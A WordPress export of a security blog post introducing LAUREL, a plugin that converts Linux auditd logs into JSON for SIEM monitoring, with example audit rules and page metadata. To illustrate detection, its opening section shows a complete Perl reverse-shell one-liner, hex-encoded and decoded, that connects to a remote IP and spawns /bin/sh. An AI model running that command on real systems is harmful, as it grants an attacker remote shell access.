{"id":26391,"date":"2022-08-12T12:56:57","date_gmt":"2022-08-12T12:56:57","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=26391"},"modified":"2022-08-12T12:57:00","modified_gmt":"2022-08-12T12:57:00","slug":"laurel","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/laurel\/","title":{"rendered":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage"},"content":{"rendered":"\n<p><strong>LAUREL<\/strong> is an event post-processing plugin for&nbsp;<em>auditd(8)<\/em>&nbsp;to improve its usability in modern security monitoring setups.<\/p>\n\n\n\n<h2 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/threathunters-io\/laurel#why\"><\/a>Why?<\/h2>\n\n\n\n<p>TLDR: Instead of audit events that look like this\u2026<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0=&#8221;perl&#8221; a1=&#8221;-e&#8221; a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742\u2026<\/strong><\/p>\n\n\n\n<p>\u2026turn them into JSON logs where the mess that your pen testers\/red teamers\/attackers are trying to make becomes apparent at first glance:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>{ \u2026 &#8220;EXECVE&#8221;:{ &#8220;argc&#8221;: 3,&#8221;ARGV&#8221;: [&#8220;perl&#8221;, &#8220;-e&#8221;, &#8220;use Socket;$i=\\&#8221;10.0.0.1\\&#8221;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\&#8221;tcp\\&#8221;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\&#8221;&gt;&amp;S\\&#8221;);open(STDOUT,\\&#8221;&gt;&amp;S\\&#8221;);open(STDERR,\\&#8221;&gt;&amp;S\\&#8221;);exec(\\&#8221;\/bin\/sh -i\\&#8221;);};&#8221;]}, \u2026}<\/strong><\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\">Description<\/h2>\n\n\n\n<p>Logs produced by the Linux Audit subsystem and&nbsp;<em>auditd(8)<\/em>&nbsp;contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via&nbsp;<code>PATH<\/code>&nbsp;and&nbsp;<code>EXECVE<\/code>&nbsp;elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see&nbsp;Practical&nbsp;<em>auditd(8)<\/em>&nbsp;problems.<\/p>\n\n\n\n<p><em>LAUREL<\/em>&nbsp;solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace&nbsp;<em>auditd(8)<\/em>&nbsp;as the consumer of audit messages from the kernel. Instead, it uses the&nbsp;<em>audisp<\/em>&nbsp;(&#8220;audit dispatch&#8221;) interface to receive messages via&nbsp;<em>auditd(8)<\/em>. Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).<\/p>\n\n\n\n<p>Refer to&nbsp;JSON-based log format&nbsp;for a description of the log format.<\/p>\n\n\n\n<p>We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to&nbsp;Performance&nbsp;for details.<\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/threathunters-io\/laurel#a-word-about-audit-rules\"><\/a>A word about audit rules<\/h2>\n\n\n\n<p>A good starting point for an audit ruleset is&nbsp;https:\/\/github.com\/Neo23x0\/auditd, but generally speaking, any ruleset will do.&nbsp;<em>LAUREL<\/em>&nbsp;will currently only work as designed if&nbsp;<em>End Of Event<\/em>&nbsp;record are not suppressed, so rules like<\/p>\n\n\n\n<p><code><strong>-a always,exclude -F msgtype=EOE<\/strong><\/code><\/p>\n\n\n\n<p>should be removed.<\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/threathunters-io\/laurel#events-with-context\"><\/a>Events with context<\/h2>\n\n\n\n<p>Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available,&nbsp;<code>id<\/code>&nbsp;points to the message corresponding to the last&nbsp;<code>execve<\/code>&nbsp;syscall for this process:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>&#8220;PARENT_INFO&#8221;: {<br>&#8220;ID&#8221;: &#8220;1643635026.276:327308&#8221;,<br>&#8220;comm&#8221;: &#8220;sh&#8221;,<br>&#8220;exe&#8221;: &#8220;\/usr\/bin\/dash&#8221;,<br>&#8220;ppid&#8221;: 1532<br>}<\/strong><\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\">Adding more context: Keys and process labels<\/h2>\n\n\n\n<p>Audit events can contain a key, a short string that can be used to filter events.&nbsp;<em>LAUREL<\/em>&nbsp;can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.<\/p>\n\n\n\n<p>Consider the following rule that set keys for&nbsp;<em>apt<\/em>&nbsp;and&nbsp;<em>dpkg<\/em>&nbsp;invocations:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>-w \/usr\/bin\/apt-get -p x -k software_mgmt<\/strong><\/p>\n\n\n\n<p>Together with a ruleset that logs&nbsp;<em>execve(2)<\/em>&nbsp;and variants, this will cause every event directly caused by&nbsp;<code><strong>apt-get<\/strong><\/code>&nbsp;and its subprocesses to be labelled&nbsp;<code><strong>software_mgmt<\/strong><\/code>.<\/p>\n\n\n\n<p>For example, running&nbsp;<code><strong>sudo apt-get update<\/strong><\/code>&nbsp;on a Debian\/bullseye system with a few sources configured, the following subprocesses labelled&nbsp;<code><strong>software_gmt<\/strong><\/code>&nbsp;can be observed in&nbsp;<em>LAUREL&#8217;s<\/em>&nbsp;audit log:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong><code>apt-get update<\/code><\/strong><\/li><li><strong><code>\/usr\/bin\/dpkg --print-foreign-architectures<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/http<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/https<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/https<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/http<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/gpgv<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/gpgv<\/code><\/strong><\/li><li><strong><code>\/usr\/bin\/dpkg --print-foreign-architectures<\/code><\/strong><\/li><li><strong><code>\/usr\/bin\/dpkg --print-foreign-architectures<\/code><\/strong><\/li><\/ul>\n\n\n\n<p>This sort of tracking also works for package installation or removal. If some package&#8217;s post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.<\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-16018d1d wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/threathunters-io\/laurel\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>LAUREL is an event post-processing plugin for&nbsp;auditd(8)&nbsp;to improve its usability in modern security monitoring setups. Why? TLDR: Instead of audit events that look like this\u2026 type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0=&#8221;perl&#8221; a1=&#8221;-e&#8221; a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742\u2026 \u2026turn them into JSON logs where the mess that your pen testers\/red teamers\/attackers are trying to make becomes apparent at first glance: { \u2026 [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":26400,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[5516,5517,3103],"class_list":["post-26391","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-laurel","tag-linux-audit-logs","tag-siem"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage<\/title>\n<meta name=\"description\" content=\"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/laurel\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage\" \/>\n<meta property=\"og:description\" content=\"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/laurel\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-12T12:56:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-08-12T12:57:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage\",\"datePublished\":\"2022-08-12T12:56:57+00:00\",\"dateModified\":\"2022-08-12T12:57:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\"},\"wordCount\":656,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"keywords\":[\"Laurel\",\"Linux Audit Logs\",\"siem\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/laurel\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\",\"name\":\"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"datePublished\":\"2022-08-12T12:56:57+00:00\",\"dateModified\":\"2022-08-12T12:57:00+00:00\",\"description\":\"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/laurel\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage","description":"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/laurel\/","og_locale":"en_US","og_type":"article","og_title":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage","og_description":"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.","og_url":"https:\/\/kalilinuxtutorials.com\/laurel\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2022-08-12T12:56:57+00:00","article_modified_time":"2022-08-12T12:57:00+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage","datePublished":"2022-08-12T12:56:57+00:00","dateModified":"2022-08-12T12:57:00+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/"},"wordCount":656,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","keywords":["Laurel","Linux Audit Logs","siem"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/laurel\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/laurel\/","url":"https:\/\/kalilinuxtutorials.com\/laurel\/","name":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","datePublished":"2022-08-12T12:56:57+00:00","dateModified":"2022-08-12T12:57:00+00:00","description":"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/laurel\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":29237,"url":"https:\/\/kalilinuxtutorials.com\/auditpolcis\/","url_meta":{"origin":26391,"position":0},"title":"auditpolCIS : CIS Benchmark Testing Of Windows SIEM Configuration","author":"R K","date":"July 18, 2023","format":false,"excerpt":"auditpolCIS is a CIS Benchmark testing of Windows SIEM configuration. This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points: The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019. The script\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=700%2C400&ssl=1 